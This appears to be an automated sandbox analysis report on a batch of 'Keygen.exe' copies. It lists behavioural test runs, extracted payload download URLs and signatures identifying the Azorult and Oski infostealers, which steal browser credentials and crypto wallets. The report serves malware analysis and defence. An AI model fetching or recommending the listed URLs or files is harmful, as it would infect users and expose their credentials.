201001-nyhbt4p25j_pw_infected/Keygen — копия (25) — копия.exe
Resource
win7
Behavioral task
behavioral130
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (25) — копия.exe
Resource
win10v200722
Behavioral task
behavioral131
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (25).exe
Resource
win7v200722
Behavioral task
behavioral132
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (25).exe
Resource
win10v200722
Behavioral task
behavioral133
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (26) — копия.exe
Resource
win7v200722
Behavioral task
behavioral134
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (26) — копия.exe
Resource
win10
Behavioral task
behavioral135
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (26).exe
Resource
win7
Behavioral task
behavioral136
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (26).exe
Resource
win10
Behavioral task
behavioral137
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (27) — копия.exe
Resource
win7
Behavioral task
behavioral138
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (27) — копия.exe
Resource
win10v200722
Behavioral task
behavioral139
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (27).exe
Resource
win7
Behavioral task
behavioral140
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (27).exe
Resource
win10v200722
Behavioral task
behavioral141
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (28) — копия.exe
Resource
win7
Behavioral task
behavioral142
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (28) — копия.exe
Resource
win10v200722
Behavioral task
behavioral143
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (28).exe
Resource
win7
Behavioral task
behavioral144
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (28).exe
Resource
win10v200722
Behavioral task
behavioral145
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (29) — копия.exe
Resource
win7
Behavioral task
behavioral146
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (29) — копия.exe
Resource
win10v200722
Behavioral task
behavioral147
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (29).exe
Resource
win7
Behavioral task
behavioral148
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (29).exe
Resource
win10v200722
Behavioral task
behavioral149
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (3) — копия.exe
Resource
win7v200722
Behavioral task
behavioral150
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (3) — копия.exe
Resource
win10
Behavioral task
behavioral151
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (3).exe
Resource
win7
Behavioral task
behavioral152
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (3).exe
Resource
win10
Behavioral task
behavioral153
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (30) — копия.exe
Resource
win7
Behavioral task
behavioral154
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (30) — копия.exe
Resource
win10
Behavioral task
behavioral155
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (30).exe
Resource
win7v200722
Behavioral task
behavioral156
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (30).exe
Resource
win10
Behavioral task
behavioral157
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (31) — копия.exe
Resource
win7v200722
Behavioral task
behavioral158
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (31) — копия.exe
Resource
win10
Behavioral task
behavioral159
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (31).exe
Resource
win7v200722
Behavioral task
behavioral160
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (31).exe
Resource
win10v200722
Behavioral task
behavioral161
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (32) — копия.exe
Resource
win7
Behavioral task
behavioral162
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (32) — копия.exe
Resource
win10
Behavioral task
behavioral163
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (32).exe
Resource
win7
Behavioral task
behavioral164
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (32).exe
Resource
win10
Behavioral task
behavioral165
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (33) — копия.exe
Resource
win7
Behavioral task
behavioral166
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (33) — копия.exe
Resource
win10v200722
Behavioral task
behavioral167
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (33).exe
Resource
win7
Behavioral task
behavioral168
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (33).exe
Resource
win10
Behavioral task
behavioral169
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (34) — копия.exe
Resource
win7v200722
Behavioral task
behavioral170
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (34) — копия.exe
Resource
win10v200722
Behavioral task
behavioral171
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (34).exe
Resource
win7v200722
Behavioral task
behavioral172
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (34).exe
Resource
win10v200722
Behavioral task
behavioral173
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (35) — копия.exe
Resource
win7v200722
Behavioral task
behavioral174
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (35) — копия.exe
Resource
win10v200722
Behavioral task
behavioral175
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (35).exe
Resource
win7v200722
Behavioral task
behavioral176
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (35).exe
Resource
win10v200722
Behavioral task
behavioral177
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (36) — копия.exe
Resource
win7v200722
Behavioral task
behavioral178
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (36) — копия.exe
Resource
win10v200722
Behavioral task
behavioral179
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (36).exe
Resource
win7v200722
Behavioral task
behavioral180
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (36).exe
Resource
win10v200722
Behavioral task
behavioral181
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (37) — копия.exe
Resource
win7v200722
Behavioral task
behavioral182
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (37) — копия.exe
Resource
win10v200722
Behavioral task
behavioral183
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (37).exe
Resource
win7v200722
Behavioral task
behavioral184
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (37).exe
Resource
win10v200722
Behavioral task
behavioral185
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (38) — копия.exe
Resource
win7v200722
Behavioral task
behavioral186
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (38) — копия.exe
Resource
win10
Behavioral task
behavioral187
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (38).exe
Resource
win7
Behavioral task
behavioral188
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (38).exe
Resource
win10
Behavioral task
behavioral189
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (39) — копия.exe
Resource
win7v200722
Behavioral task
behavioral190
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (39) — копия.exe
Resource
win10
Behavioral task
behavioral191
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (4) — копия.exe
Resource
win7v200722
Behavioral task
behavioral192
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (4) — копия.exe
Resource
win10
Behavioral task
behavioral193
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (4).exe
Resource
win7
Behavioral task
behavioral194
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (4).exe
Resource
win10
Behavioral task
behavioral195
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (40) — копия.exe
Resource
win7
Behavioral task
behavioral196
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (40) — копия.exe
Resource
win10
Behavioral task
behavioral197
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (41) — копия.exe
Resource
win7
Behavioral task
behavioral198
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (41) — копия.exe
Resource
win10
Behavioral task
behavioral199
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (42) — копия.exe
Resource
win7v200722
Behavioral task
behavioral200
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (42) — копия.exe
Resource
win10
Behavioral task
behavioral201
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (43) — копия.exe
Resource
win7
Behavioral task
behavioral202
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (43) — копия.exe
Resource
win10
Behavioral task
behavioral203
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (44) — копия.exe
Resource
win7v200722
Behavioral task
behavioral204
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (44) — копия.exe
Resource
win10
Behavioral task
behavioral205
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (45) — копия.exe
Resource
win7v200722
Behavioral task
behavioral206
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (45) — копия.exe
Resource
win10v200722
Behavioral task
behavioral207
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (46) — копия.exe
Resource
win7v200722
Behavioral task
behavioral208
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (46) — копия.exe
Resource
win10v200722
Behavioral task
behavioral209
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (47) — копия.exe
Resource
win7
Behavioral task
behavioral210
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (47) — копия.exe
Resource
win10
Behavioral task
behavioral211
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (48) — копия.exe
Resource
win7v200722
Behavioral task
behavioral212
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (48) — копия.exe
Resource
win10
Behavioral task
behavioral213
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (49) — копия.exe
Resource
win7v200722
Behavioral task
behavioral214
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (49) — копия.exe
Resource
win10
Behavioral task
behavioral215
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (5) — копия.exe
Resource
win7v200722
Behavioral task
behavioral216
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (5) — копия.exe
Resource
win10
Behavioral task
behavioral217
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (5).exe
Resource
win7v200722
Behavioral task
behavioral218
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (5).exe
Resource
win10
Behavioral task
behavioral219
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (50) — копия.exe
Resource
win7v200722
Behavioral task
behavioral220
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (50) — копия.exe
Resource
win10
Behavioral task
behavioral221
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (51) — копия.exe
Resource
win7
Behavioral task
behavioral222
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (51) — копия.exe
Resource
win10
Behavioral task
behavioral223
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (52) — копия.exe
Resource
win7v200722
Behavioral task
behavioral224
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (52) — копия.exe
Resource
win10v200722
Behavioral task
behavioral225
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (53) — копия.exe
Resource
win7v200722
Behavioral task
behavioral226
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (53) — копия.exe
Resource
win10v200722
Behavioral task
behavioral227
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (54) — копия.exe
Resource
win7v200722
Behavioral task
behavioral228
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (54) — копия.exe
Resource
win10v200722
Behavioral task
behavioral229
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (55) — копия.exe
Resource
win7
Behavioral task
behavioral230
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (55) — копия.exe
Resource
win10v200722
Behavioral task
behavioral231
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (56) — копия.exe
Resource
win7v200722
Behavioral task
behavioral232
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (56) — копия.exe
Resource
win10v200722
Behavioral task
behavioral233
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (57) — копия.exe
Resource
win7v200722
Behavioral task
behavioral234
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (57) — копия.exe
Resource
win10v200722
Behavioral task
behavioral235
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (58) — копия.exe
Resource
win7v200722
Behavioral task
behavioral236
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (58) — копия.exe
Resource
win10v200722
Behavioral task
behavioral237
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (59) — копия.exe
Resource
win7v200722
Behavioral task
behavioral238
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (59) — копия.exe
Resource
win10v200722
Behavioral task
behavioral239
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (6) — копия.exe
Resource
win7v200722
Behavioral task
behavioral240
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (6) — копия.exe
Resource
win10v200722
Behavioral task
behavioral241
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (6).exe
Resource
win7v200722
Behavioral task
behavioral242
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (6).exe
Resource
win10v200722
Behavioral task
behavioral243
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (60) — копия.exe
Resource
win7v200722
Behavioral task
behavioral244
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (60) — копия.exe
Resource
win10v200722
Behavioral task
behavioral245
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (61) — копия.exe
Resource
win7
Behavioral task
behavioral246
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (61) — копия.exe
Resource
win10
Behavioral task
behavioral247
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (62) — копия.exe
Resource
win7
Behavioral task
behavioral248
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (62) — копия.exe
Resource
win10
Behavioral task
behavioral249
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (63) — копия.exe
Resource
win7
Behavioral task
behavioral250
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (63) — копия.exe
Resource
win10
Behavioral task
behavioral251
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (64) — копия.exe
Resource
win7
Behavioral task
behavioral252
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (64) — копия.exe
Resource
win10v200722
Behavioral task
behavioral253
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (65) — копия.exe
Resource
win7
Behavioral task
behavioral254
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (65) — копия.exe
Resource
win10
Behavioral task
behavioral255
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (66) — копия.exe
Resource
win7
Behavioral task
behavioral256
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (66) — копия.exe
Resource
win10
Behavioral task
behavioral257
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (67) — копия.exe
Resource
win7
Behavioral task
behavioral258
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (67) — копия.exe
Resource
win10
Behavioral task
behavioral259
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (68) — копия.exe
Resource
win7
Behavioral task
behavioral260
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (68) — копия.exe
Resource
win10
Behavioral task
behavioral261
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (69) — копия.exe
Resource
win7
Behavioral task
behavioral262
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (69) — копия.exe
Resource
win10
Behavioral task
behavioral263
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (7) — копия.exe
Resource
win7
Behavioral task
behavioral264
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (7) — копия.exe
Resource
win10
Behavioral task
behavioral265
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (7).exe
Resource
win7v200722
Behavioral task
behavioral266
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (7).exe
Resource
win10v200722
Behavioral task
behavioral267
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (70) — копия.exe
Resource
win7v200722
Behavioral task
behavioral268
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (70) — копия.exe
Resource
win10
Behavioral task
behavioral269
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (71) — копия.exe
Resource
win7
Behavioral task
behavioral270
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (71) — копия.exe
Resource
win10
Behavioral task
behavioral271
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (72) — копия.exe
Resource
win7
Behavioral task
behavioral272
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (72) — копия.exe
Resource
win10v200722
Behavioral task
behavioral273
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (73) — копия.exe
Resource
win7
Behavioral task
behavioral274
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (73) — копия.exe
Resource
win10v200722
Behavioral task
behavioral275
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (74) — копия.exe
Resource
win7
Behavioral task
behavioral276
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (74) — копия.exe
Resource
win10
Behavioral task
behavioral277
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (75) — копия.exe
Resource
win7v200722
Behavioral task
behavioral278
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (75) — копия.exe
Resource
win10
Behavioral task
behavioral279
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (76) — копия.exe
Resource
win7v200722
Behavioral task
behavioral280
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (76) — копия.exe
Resource
win10
Behavioral task
behavioral281
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (77) — копия.exe
Resource
win7v200722
Behavioral task
behavioral282
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (77) — копия.exe
Resource
win10
Behavioral task
behavioral283
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (78) — копия.exe
Resource
win7v200722
Behavioral task
behavioral284
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (78) — копия.exe
Resource
win10
Behavioral task
behavioral285
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (79) — копия.exe
Resource
win7v200722
Behavioral task
behavioral286
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (79) — копия.exe
Resource
win10
Behavioral task
behavioral287
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (8) — копия.exe
Resource
win7v200722
Behavioral task
behavioral288
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (8) — копия.exe
Resource
win10v200722
Behavioral task
behavioral289
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (8).exe
Resource
win7v200722
Behavioral task
behavioral290
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (8).exe
Resource
win10v200722
Behavioral task
behavioral291
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (80) — копия.exe
Resource
win7v200722
Behavioral task
behavioral292
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (80) — копия.exe
Resource
win10
Behavioral task
behavioral293
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (81) — копия.exe
Resource
win7v200722
Behavioral task
behavioral294
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (81) — копия.exe
Resource
win10v200722
Behavioral task
behavioral295
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (82) — копия.exe
Resource
win7v200722
Behavioral task
behavioral296
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (82) — копия.exe
Resource
win10
Behavioral task
behavioral297
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (83) — копия.exe
Resource
win7
Behavioral task
behavioral298
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (83) — копия.exe
Resource
win10v200722
Behavioral task
behavioral299
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (84) — копия.exe
Resource
win7v200722
Behavioral task
behavioral300
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (84) — копия.exe
Resource
win10
Behavioral task
behavioral301
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (85) — копия.exe
Resource
win7
Behavioral task
behavioral302
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (85) — копия.exe
Resource
win10v200722
Behavioral task
behavioral303
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (86) — копия.exe
Resource
win7
Behavioral task
behavioral304
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (86) — копия.exe
Resource
win10v200722
Behavioral task
behavioral305
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (87) — копия.exe
Resource
win7v200722
Behavioral task
behavioral306
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (87) — копия.exe
Resource
win10v200722
Behavioral task
behavioral307
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (88) — копия.exe
Resource
win7
Behavioral task
behavioral308
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (88) — копия.exe
Resource
win10
Behavioral task
behavioral309
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (89) — копия.exe
Resource
win7
Behavioral task
behavioral310
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (89) — копия.exe
Resource
win10v200722
Behavioral task
behavioral311
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (9) — копия.exe
Resource
win7
Behavioral task
behavioral312
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (9) — копия.exe
Resource
win10v200722
Behavioral task
behavioral313
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (9).exe
Resource
win7v200722
Behavioral task
behavioral314
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (9).exe
Resource
win10
Behavioral task
behavioral315
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (90) — копия.exe
Resource
win7
Behavioral task
behavioral316
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (90) — копия.exe
Resource
win10
Behavioral task
behavioral317
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (91) — копия.exe
Resource
win7v200722
Behavioral task
behavioral318
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (91) — копия.exe
Resource
win10v200722
Behavioral task
behavioral319
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (92) — копия.exe
Resource
win7v200722
Behavioral task
behavioral320
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (92) — копия.exe
Resource
win10
Behavioral task
behavioral321
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (93) — копия.exe
Resource
win7v200722
Behavioral task
behavioral322
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (93) — копия.exe
Resource
win10v200722
Behavioral task
behavioral323
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (94) — копия.exe
Resource
win7v200722
Behavioral task
behavioral324
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (94) — копия.exe
Resource
win10v200722
Behavioral task
behavioral325
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (95) — копия.exe
Resource
win7
Behavioral task
behavioral326
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (95) — копия.exe
Resource
win10
Behavioral task
behavioral327
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (96) — копия.exe
Resource
win7
Behavioral task
behavioral328
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (96) — копия.exe
Resource
win10
Behavioral task
behavioral329
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (97) — копия.exe
Resource
win7
Behavioral task
behavioral330
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (97) — копия.exe
Resource
win10
Behavioral task
behavioral331
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (98) — копия.exe
Resource
win7v200722
Behavioral task
behavioral332
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (98) — копия.exe
Resource
win10
Behavioral task
behavioral333
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (99) — копия.exe
Resource
win7
Behavioral task
behavioral334
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия (99) — копия.exe
Resource
win10v200722
Behavioral task
behavioral335
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (2).exe
Resource
win7v200722
Behavioral task
behavioral336
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (2).exe
Resource
win10v200722
Behavioral task
behavioral337
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (3).exe
Resource
win7
Behavioral task
behavioral338
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (3).exe
Resource
win10v200722
Behavioral task
behavioral339
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (4).exe
Resource
win7v200722
Behavioral task
behavioral340
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия (4).exe
Resource
win10
Behavioral task
behavioral341
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия.exe
Resource
win7
Behavioral task
behavioral342
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия — копия.exe
Resource
win10v200722
Behavioral task
behavioral343
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия.exe
Resource
win7
Behavioral task
behavioral344
Sample
201001-nyhbt4p25j_pw_infected/Keygen — копия.exe
Resource
win10
Behavioral task
behavioral345
Sample
201001-nyhbt4p25j_pw_infected/Keygen.exe
Resource
win7v200722
Behavioral task
behavioral346
Sample
201001-nyhbt4p25j_pw_infected/Keygen.exe
Resource
win10v200722
General
Malware Config
Extracted
http://zxvbcrt.ug/zxcvb.exe
http://zxvbcrt.ug/zxcvb.exe
Extracted
http://bit.do/fqhHT
http://bit.do/fqhHT
Extracted
http://bit.do/fqhJv
http://bit.do/fqhJv
Extracted
http://pdshcjvnv.ug/zxcvb.exe
http://pdshcjvnv.ug/zxcvb.exe
Extracted
http://bit.do/fqhJD
http://bit.do/fqhJD
Extracted
http://rbcxvnb.ug/zxcvb.exe
http://rbcxvnb.ug/zxcvb.exe
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 12 1484 powershell.exe 15 1592 powershell.exe 16 1500 powershell.exe 18 1484 powershell.exe 21 1592 powershell.exe 22 1500 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
Processes:
Keygen.exepmo.exesnd.exervm.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exesnd.exeNHtrdsaghfDF.exervm.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exepmo.exehgfnmbasdo.exehgfnmbasdo.exeaxcsdfa.exeaxcsdfa.exepid process 1852 Keygen.exe 2592 pmo.exe 2668 snd.exe 2692 rvm.exe 2820 FVjhgtresfdbv.exe 2844 NHtrdsaghfDF.exe 2856 FVjhgtresfdbv.exe 2892 NHtrdsaghfDF.exe 2964 snd.exe 2984 NHtrdsaghfDF.exe 3008 rvm.exe 3056 FVjhgtresfdbv.exe 2220 NHtrdsaghfDF.exe 1460 FVjhgtresfdbv.exe 2564 pmo.exe 1608 hgfnmbasdo.exe 1036 hgfnmbasdo.exe 596 axcsdfa.exe 392 axcsdfa.exe -
Loads dropped DLL 44 IoCs
Processes:
cmd.exepowershell.exepowershell.exepowershell.exesnd.exervm.exeNHtrdsaghfDF.exeFVjhgtresfdbv.exeFVjhgtresfdbv.exeNHtrdsaghfDF.exeWScript.exeFVjhgtresfdbv.exeWerFault.exehgfnmbasdo.exeWScript.exeWerFault.exeaxcsdfa.exeWerFault.exepid process 1812 cmd.exe 1500 powershell.exe 1484 powershell.exe 1484 powershell.exe 1592 powershell.exe 1592 powershell.exe 2668 snd.exe 2668 snd.exe 2668 snd.exe 2692 rvm.exe 2692 rvm.exe 2668 snd.exe 2692 rvm.exe 2692 rvm.exe 2844 NHtrdsaghfDF.exe 2820 FVjhgtresfdbv.exe 2856 FVjhgtresfdbv.exe 2892 NHtrdsaghfDF.exe 2588 WScript.exe 1460 FVjhgtresfdbv.exe 1460 FVjhgtresfdbv.exe 1460 FVjhgtresfdbv.exe 1460 FVjhgtresfdbv.exe 1460 FVjhgtresfdbv.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 1956 WerFault.exe 1608 hgfnmbasdo.exe 2632 WScript.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 596 axcsdfa.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe 1156 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 9 IoCs
Processes:
